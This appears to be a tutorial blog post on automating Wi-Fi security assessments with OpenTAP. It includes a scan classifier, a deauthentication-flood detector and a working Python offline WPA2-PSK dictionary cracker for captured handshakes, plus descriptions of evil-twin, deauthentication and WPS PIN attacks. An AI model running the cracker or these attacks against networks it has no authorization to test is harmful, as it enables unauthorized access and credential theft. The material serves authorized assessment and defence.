OpenTAP and Security Testing IV - Wireless Security


Wireless Network Security Testing

  • Purpose: Evaluates the security of wireless networks and access points.

  • Methodology: OpenTAP test plans invoke scanning and analysis tools to find unauthorized or misconfigured Wi-Fi networks, weak encryption, and potential vulnerabilities, and record each tool's output as results.

  • Output: Reports on wireless network vulnerabilities and recommendations for improvements.

What is Wireless Network Security Testing

Wireless network security testing evaluates the security measures and protocols of a wireless network to identify vulnerabilities and ensure the network is protected against unauthorized access and attacks. The testing process typically includes several repeatable steps and techniques, and so benefits greatly from test automation with OpenTAP.

Wireless network security testing can be broken out into several discrete steps or phases:

Preparation and Planning

Careful planning of your security exercise will render more consistent results.

  • Scope Definition: Determine the scope of the testing, including the wireless networks, devices, and applications to be tested. Make sure that the tools you plan to use can be invoked as OpenTAP test steps, via normal command line usage or other scripted invocation methods.

  • Legal and Ethical Considerations: Obtain necessary permissions and ensure compliance with legal and ethical standards.

  • Documentation: Gather information about the network architecture, security policies, and previous security assessments.

Reconnaissance and Discovery

Find out which networks are present on your site - you may be surprised!

  • Network Scanning: Use tools to identify wireless networks (SSID), access points (APs), and devices connected to the network.

  • War Driving: Physically moving around to locate and map wireless networks and their coverage areas. Automating this step lets you build a catalog of networks detected.

  • Packet Sniffing: Capture and analyze wireless traffic to gather information about the network and identify any unencrypted data.

Vulnerability Assessment

Once you have discovered weaknesses in your wireless network security, take time to assess the severity, scope and location of those vulnerabilities. As with other steps, you can use OpenTAP result listeners and loggers to create reports from the analysis.

  • Wireless Protocol Analysis: Analyze the security of the wireless protocols in use (e.g., WEP, WPA, WPA2, WPA3) to identify weaknesses. WEP and WPA1/TKIP are broken and should be reported as findings on sight; WPA2 is acceptable only with CCMP (AES) and either a strong passphrase or enterprise (802.1X) authentication; WPA3 adds SAE and makes Protected Management Frames mandatory.

  • Configuration Review: Check the configuration settings of access points and other network devices for insecure settings (e.g., default passwords, weak encryption).

  • Firmware and Software Analysis: Ensure that the firmware and software on wireless devices are up-to-date and free from known vulnerabilities.
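The network scanning step above and the protocol analysis and configuration review just listed share one input: a scan of what is on the air. As an added example, not code from this post or from the OpenTAP project, the following Python parses the output of a Linux `iw dev wlan0 scan` run, classifies each BSS by the strongest security suite it advertises, and then checks each BSS against an asset inventory, so a foreign BSSID broadcasting a corporate SSID is flagged even when its encryption looks fine. The scan text and the `KNOWN_BSSIDS` inventory are constructed for the example, and the function names `parse_iw_scan`, `classify` and `assess` are hypothetical; a test step would feed it the real `iw` output (or a Kismet/airodump-ng export, with a different parser) instead.

```python
import re

# Constructed, abridged sample of `iw dev wlan0 scan` output (not a real capture);
# only the lines this parser consumes are kept.
SAMPLE_SCAN = """\
BSS 00:11:22:33:44:55(on wlan0)
    freq: 2412
    capability: ESS Privacy ShortSlotTime (0x0411)
    SSID: CorpNet
    RSN:     * Pairwise ciphers: CCMP
         * Authentication suites: PSK
BSS 66:77:88:99:aa:bb(on wlan0)
    freq: 2437
    capability: ESS Privacy ShortSlotTime (0x0411)
    SSID: Legacy-Printer
BSS cc:dd:ee:ff:00:11(on wlan0)
    freq: 5180
    capability: ESS ShortSlotTime (0x0401)
    SSID: Guest
BSS 12:34:56:78:9a:bc(on wlan0)
    freq: 2462
    capability: ESS Privacy ShortSlotTime (0x0411)
    SSID: OldAP
    WPA:     * Pairwise ciphers: TKIP
         * Authentication suites: PSK
BSS de:ad:be:ef:00:01(on wlan0)
    freq: 5240
    capability: ESS Privacy ShortSlotTime (0x0411)
    SSID: CorpNet
    RSN:     * Pairwise ciphers: CCMP
         * Authentication suites: SAE
"""

# Constructed asset inventory: the BSSIDs allowed to advertise each corporate SSID.
KNOWN_BSSIDS = {"CorpNet": {"00:11:22:33:44:55"}}


def parse_iw_scan(text):
    """Parse `iw ... scan` output into one dict per BSS, keeping only what the
    assessment needs: the Privacy capability bit (set for WEP and WPA*) and the
    cipher/AKM attributes of the RSN (WPA2/WPA3) and WPA (WPA1) elements."""
    networks, bss, ie = [], None, None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            bss = {"bssid": m.group(1), "ssid": "", "freq": 0,
                   "privacy": False, "rsn": {}, "wpa": {}}
            networks.append(bss)
            ie = None
            continue
        if bss is None:
            continue
        s = line.strip()
        if s.startswith("freq:"):
            bss["freq"] = int(s.split()[1])
        elif s.startswith("SSID:"):
            bss["ssid"] = s[5:].strip()
        elif s.startswith("capability:"):
            bss["privacy"] = " Privacy" in s
        elif s.startswith(("RSN:", "WPA:")):
            ie = bss["rsn"] if s.startswith("RSN:") else bss["wpa"]
            s = s.split(":", 1)[1].strip()      # first attribute shares the line
        if ie is not None and s.startswith("*"):
            key, _, value = s[1:].strip().partition(": ")
            ie[key] = value
    return networks


def classify(bss):
    """Return (security label, severity, note) for the strongest suite advertised."""
    if bss["rsn"]:
        akm = bss["rsn"].get("Authentication suites", "")
        if "SAE" in akm:
            return "WPA3-SAE", "OK", "current standard, PMF mandatory"
        if "TKIP" in bss["rsn"].get("Pairwise ciphers", ""):
            return "WPA2-TKIP", "HIGH", "TKIP is deprecated; configure CCMP only"
        return ("WPA2-" + ("PSK" if "PSK" in akm else "EAP"), "INFO",
                "acceptable; audit passphrase strength or the EAP server config")
    if bss["wpa"]:
        return "WPA1-TKIP", "HIGH", "WPA1/TKIP is deprecated; migrate to WPA2/WPA3"
    if bss["privacy"]:
        return "WEP", "CRITICAL", "WEP keys are recoverable from captured traffic"
    return "OPEN", "HIGH", "no encryption; all client traffic is sniffable"


def assess(scan_text, known=KNOWN_BSSIDS):
    """Combine protocol findings with an inventory check for rogue / evil-twin APs.
    A strong suite does not clear a BSS: the rogue in the sample advertises WPA3."""
    findings = []
    for bss in parse_iw_scan(scan_text):
        label, severity, note = classify(bss)
        if bss["ssid"] in known and bss["bssid"] not in known[bss["ssid"]]:
            severity, note = "CRITICAL", "unknown BSSID advertising a corporate SSID (rogue AP / evil twin)"
        findings.append({"bssid": bss["bssid"], "ssid": bss["ssid"], "freq": bss["freq"],
                         "security": label, "severity": severity, "note": note})
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_SCAN):
        print(f"{f['severity']:8} {f['bssid']}  {f['ssid']:15} {f['freq']:5} {f['security']:10} {f['note']}")
```

Run as a step, the findings list is what you would publish to an OpenTAP result listener; the inventory check is the part most scanners skip, and it is the one that catches the rogue and evil-twin setups described under Penetration Testing.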

Penetration Testing

You never really appreciate the gravity of network security challenges until you put on a black hat yourself and attempt to break your way in and/or fool users into helping you. Automating this activity streamlines your efforts to bust your way in. See our earlier blog on Penetration Testing for additional info.

  • Brute Force Attacks: Attempt to crack weak passwords and encryption keys using brute force methods.

  • Rogue Access Point Deployment: Set up unauthorized access points to see if they can lure legitimate users into connecting, allowing interception of network traffic.

  • Evil Twin Attack: Create a fake access point mimicking a legitimate one to capture authentication credentials and other sensitive information.

  • De-authentication Attacks: Send spoofed de-authentication frames to disconnect legitimate users from the network, then capture the WPA/WPA2 four-way handshake as they reconnect; the captured handshake can be attacked offline with a wordlist. Networks that enforce Protected Management Frames (802.11w, mandatory in WPA3) ignore unauthenticated de-authentication frames, so this step also tests whether PMF is actually enabled.
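The brute force and de-authentication items above are two halves of one chain: force a client to reconnect, capture the WPA2 four-way handshake, then guess the passphrase offline. The following Python is an added example, not code from this post or from Aircrack-ng, that reproduces the offline half with only the standard library: PBKDF2 from passphrase and SSID to the PMK, the 802.11 PRF from PMK and nonces to the PTK, and an HMAC-SHA1 MIC over EAPOL message 2, which is exactly the check aircrack-ng performs per candidate. The handshake is constructed by `make_capture` from fixed MAC addresses and nonces rather than read from a real pcap, the passphrase "CorrectHorse1" and the five-entry `WORDLIST` are hypothetical, and the function names are the example's own.

```python
import hashlib
import hmac
import struct

# Offset of the 16-byte MIC inside an EAPOL-Key frame: 4 (EAPOL header) + 1 (descriptor
# type) + 2 (key info) + 2 (key length) + 8 (replay counter) + 32 (nonce) + 16 (IV)
# + 8 (RSC) + 8 (ID) = 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """802.11 PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]            # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck, eapol):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, key_data):
    """Message 2 of the 4-way handshake (client -> AP) with the MIC field zeroed."""
    key_info = 0x010A          # descriptor version 2 (HMAC-SHA1), pairwise, MIC present
    body = (struct.pack(">BHHQ", 2, key_info, 0, 1) + snonce + b"\x00" * 16 +
            b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 +
            struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL v2, type 3 = EAPOL-Key


def make_capture(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed stand-in for what airodump-ng saves: the values an attacker gets off
    the air after a deauth forces a client to re-authenticate. Message 2 carries the
    SNonce and a MIC computed with the real KCK, so it alone is enough to crack."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK
    eapol = bytearray(build_eapol_msg2(snonce, rsn_ie))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    eapol[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(eapol))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": bytes(eapol)}


def crack_psk(capture, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> MIC per candidate and compare.
    Each candidate costs 4096 PBKDF2 rounds, which is why wordlist quality matters."""
    target = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), target):
            return candidate
    return None


# Constructed handshake: MACs and nonces are arbitrary fixed values, not a real capture.
CAPTURE = make_capture(
    "CorrectHorse1", "CorpNet",
    bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"),
    hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest())
WORDLIST = ["password", "12345678", "qwertyuiop", "CorrectHorse1", "letmein123"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(CAPTURE, WORDLIST))
```

The point for the assessment is in the numbers: because the SSID is the PBKDF2 salt, every candidate costs 4096 HMAC-SHA1 rounds per network, so a long random passphrase stays out of reach of any wordlist, while a common one falls in seconds; the finding to report is the passphrase policy, not the handshake capture itself.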


Once you're in, how broad is your access and what data is exposed?

  • Access and Escalation: Once access is gained, attempt to escalate privileges to access sensitive information or critical systems.

  • Data Exfiltration: Simulate data theft to assess the network’s detection and response capabilities.

  • Persistence: Evaluate if it’s possible to maintain access over time without detection.

Reporting and Mitigation

Don't keep your discoveries a secret! Share your findings with IT and cybersecurity teams.

  • Documentation of Findings: Compile a detailed report of all findings, including identified vulnerabilities, exploited weaknesses, and potential impacts.

  • Recommendations: Provide recommendations for mitigating identified vulnerabilities, including configuration changes, firmware updates, and improved security practices.

  • Remediation Support: Assist with the implementation of recommended security measures and verify their effectiveness through retesting.

Ongoing Monitoring and Maintenance

Incrementally improve security using what you've learned. Continue using OpenTAP to launch your security tools and record their output.

  • Continuous Monitoring: Implement continuous monitoring tools to detect and respond to new threats and vulnerabilities.

  • Regular Audits: Schedule regular security audits and testing to ensure the network remains secure as new threats emerge.
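Continuous monitoring should catch the de-authentication test described under Penetration Testing; Kismet, listed below, raises an alert on exactly this pattern. As an added example, not code from this post or from Kismet, here is that detection logic in Python over constructed 802.11 management frames. A spoofed deauth carries the AP's own address as the sender, so the detector does not trust the source field; it keys on the rate of deauth/disassoc frames per BSSID in a sliding window and on broadcast destinations, which legitimate access points rarely use. `mgmt_frame`, `sample_traffic`, the MAC addresses, timestamps and thresholds are all constructed for the example; in practice the frames would come from a monitor-mode capture.

```python
import struct
from collections import defaultdict, deque

MGMT, DEAUTH, DISASSOC, BEACON = 0, 12, 10, 8   # frame type 0 and its subtypes
BROADCAST = b"\xff" * 6


def mgmt_frame(subtype, da, sa, bssid, seq, body=b""):
    """Build a minimal 802.11 management frame (used here only to construct sample traffic)."""
    fc = bytes([(MGMT << 2) | (subtype << 4), 0x00])      # version 0, type 0, flags 0
    return fc + b"\x00\x00" + da + sa + bssid + struct.pack("<H", seq << 4) + body


def parse_header(frame):
    """Return (type, subtype, addr1, addr2, addr3) or None if too short for a mgmt header."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    return (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF, frame[4:10], frame[10:16], frame[16:22]


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Scan (timestamp, raw 802.11 frame) pairs for deauth/disassoc bursts.

    Signals: number of deauth/disassoc frames per BSSID within `window` seconds,
    and whether any were addressed to broadcast. One alert is emitted per BSSID."""
    recent = defaultdict(deque)        # bssid -> (ts, is_broadcast, reason) in the window
    alerts, alerted = [], set()
    for ts, raw in frames:
        hdr = parse_header(raw)
        if hdr is None:
            continue
        ftype, subtype, da, _sa, bssid = hdr
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        reason = struct.unpack("<H", raw[24:26])[0] if len(raw) >= 26 else None
        q = recent[bssid]
        q.append((ts, da == BROADCAST, reason))
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({
                "bssid": bssid.hex(":"),
                "count": len(q),
                "first": q[0][0], "last": ts,
                "broadcast": any(b for _, b, _ in q),
                "reasons": sorted({r for _, _, r in q if r is not None}),
            })
    return alerts


def sample_traffic():
    """Constructed capture: beacons, one legitimate deauth, then an injected flood."""
    ap, client = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    frames = [(t / 10, mgmt_frame(BEACON, BROADCAST, ap, ap, t)) for t in range(10)]
    # a single legitimate deauth: the AP tells a leaving client it is deauthenticated (reason 3)
    frames.append((0.95, mgmt_frame(DEAUTH, client, ap, ap, 100, struct.pack("<H", 3))))
    # flood: 24 broadcast deauths spoofing the AP within ~0.1 s, reason code 7 (class 3
    # frame from a non-associated station), the code commonly seen in injected deauths
    for i in range(24):
        frames.append((2.0 + i * 0.004, mgmt_frame(DEAUTH, BROADCAST, ap, ap, 200 + i,
                                                     struct.pack("<H", 7))))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_traffic()):
        print(alert)
```

Running the de-authentication step from OpenTAP while this detector (or Kismet) watches the same channel gives a pass/fail for the monitoring side as well as for the network: if the flood is not alerted on, that is a finding for the SOC, and if clients stay connected through it, PMF is doing its job.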

Tools for Wireless Network Security Testing

The following open source tools are employed by cybersecurity pros to test wireless networks:

Aircrack-ng: Aircrack-ng is a suite of tools for assessing WiFi network security. It focuses on multiple areas of WiFi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third party tools

  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection

  • Testing: Checking WiFi cards and driver capabilities (capture and injection)

  • Cracking: WEP and WPA PSK (WPA 1 and 2)

Primarily command-line driven, Aircrack-ng runs on Linux, Windows, macOS, FreeBSD, OpenBSD, NetBSD, as well as Solaris. Learn more.

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a/b/g/n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and macOS. The client can also run on Microsoft Windows, but with limited use cases. Learn more.

Metasploit: The Metasploit Project is a computer security project that provides information about vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research. Learn more.

Reaver: Reaver is included in Kali Linux and provides capabilities for brute force attacks on WPS (Wi-Fi Protected Setup) PINs. The 8-digit WPS PIN is checked by the access point in two halves and its last digit is a checksum, so the search space is roughly 11,000 attempts rather than 10^8; an access point with WPS enabled and no lockout is a finding in itself. Learn more.

Wireshark: Wireshark is a free and open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development. Wireshark is cross-platform, running on Linux, macOS, BSD, Solaris, and other Unix operating systems, and Microsoft Windows. Learn more.

By conducting thorough wireless network security testing, organizations can identify and address vulnerabilities, ensuring their wireless networks are secure against unauthorized access and cyber attacks.

The Impact of Test Automation

Automating your wireless network security testing with OpenTAP streamlines the entire process, makes your testing easily repeatable, and facilitates logging and documenting your results. Using OpenTAP enhances the efficiency, accuracy, and effectiveness of security testing efforts, helping identify and remediate security vulnerabilities before they can be exploited by attackers.